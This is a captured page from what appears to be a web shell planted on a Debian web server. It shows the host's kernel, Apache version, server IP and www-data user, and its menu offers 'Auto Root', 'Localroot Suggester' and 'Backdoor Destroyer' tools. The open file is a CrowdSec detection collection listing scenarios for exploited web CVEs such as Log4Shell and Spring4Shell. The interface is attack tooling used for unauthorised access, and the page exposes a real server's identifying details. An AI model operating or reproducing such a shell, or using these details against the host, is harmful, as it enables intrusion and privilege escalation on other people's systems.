Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
crowdsec /
collections /
Delete
Unzip
Name
Size
Permission
Date
Action
apache2.yaml
265
B
-rw-r--r--
2024-10-04 14:15
base-http-scenarios.yaml
761
B
-rw-r--r--
2024-10-04 14:15
http-cve.yaml
1.14
KB
-rw-r--r--
2024-10-04 14:15
linux.yaml
233
B
-rw-r--r--
2024-10-04 14:15
mysql.yaml
201
B
-rw-r--r--
2024-03-12 23:06
sshd.yaml
300
B
-rw-r--r--
2024-10-04 14:15
Save
Rename
scenarios: - crowdsecurity/http-cve-2021-41773 - crowdsecurity/http-cve-2021-42013 - crowdsecurity/grafana-cve-2021-43798 - crowdsecurity/vmware-vcenter-vmsa-2021-0027 - crowdsecurity/fortinet-cve-2018-13379 - crowdsecurity/pulse-secure-sslvpn-cve-2019-11510 - crowdsecurity/f5-big-ip-cve-2020-5902 - crowdsecurity/thinkphp-cve-2018-20062 - crowdsecurity/apache_log4j2_cve-2021-44228 - crowdsecurity/jira_cve-2021-26086 - crowdsecurity/spring4shell_cve-2022-22965 - crowdsecurity/vmware-cve-2022-22954 - crowdsecurity/CVE-2022-37042 - crowdsecurity/CVE-2022-41082 - crowdsecurity/CVE-2022-35914 - crowdsecurity/CVE-2022-40684 - crowdsecurity/CVE-2022-26134 - crowdsecurity/CVE-2022-42889 - crowdsecurity/CVE-2022-41697 - crowdsecurity/CVE-2022-46169 - crowdsecurity/CVE-2022-44877 - crowdsecurity/CVE-2019-18935 - crowdsecurity/netgear_rce - crowdsecurity/CVE-2023-22515 - crowdsecurity/CVE-2023-22518 - crowdsecurity/CVE-2023-49103 - crowdsecurity/CVE-2017-9841 - crowdsecurity/CVE-2024-38475 author: crowdsecurity description: "Detect CVE exploitation in http logs" tags: - web - exploit - cve - http